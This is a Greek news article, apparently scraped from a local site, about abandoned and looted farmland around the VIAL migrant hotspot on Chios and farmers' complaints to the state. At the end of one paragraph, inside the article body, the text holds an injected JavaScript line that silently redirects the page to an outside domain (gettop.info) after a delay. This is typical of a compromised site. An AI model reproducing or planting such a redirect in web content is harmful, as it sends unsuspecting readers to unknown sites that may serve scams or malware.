Άβατο τα χωράφια περιμετρικά της ΒΙΑΛ – Τα εγκαταλείπουν αγρότες και κάτοικοι (ΒΙΝΤΕΟ)

0
9

 

Νεκρή ζώνη στην πιο παραγωγική περίοδο του χρόνου θυμίζουν τα χωράφια περιμετρικά του Hotspot της ΒΙ.ΑΛ. στο Χαλκειός, με τους αγρότες και τους μόνιμους κατοίκους της περιοχής να υψώνουν φωνή αγανάκτησης ζητώντας από την πολιτεία να τηρήσει επιτέλους τις δεσμεύσεις της.

Χωράφια μέσα στα σκουπίδια, λεηλατημένες αγροικίες, ξηλωμένα συρματοπλέγματα αποτελούν τη σημερινή τραγική εικόνα μίας περιοχής που μέχρι πέρσι έσφυζε από παραγωγική δραστηριότητα, σύμφωνα με το politischios.gr.

Απελπισμένοι και ταυτόχρονα απογοητευμένοι από την αντιμετώπιση της πολιτείας, οι περισσότεροι από αυτούς δηλώνουν ότι η φετινή χρονιά πήγε χαμένη αφού η οποιαδήποτε απόπειρα καλλιέργειας των χωραφιών τους έπεσε στο κενό.

Ακόμα χειρότερη είναι η κατάσταση στις ελάχιστες αγροικίες που βρίσκονται ακριβώς δίπλα στο hotspot.

Το σκηνικό εγκατάλειψης επαναλαμβάνεται και λίγα μέτρα μακρύτερα στα χωράφια που βρίσκονται σε ακτίνα 500 μέτρων. Όπως εξηγούν οι κάτοικοι ενώ θα έπρεπε τέτοια εποχή να γίνεται το μάζεμα της ελιάς, οι εκτάσεις έχουν αφεθεί στην τύχη τους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here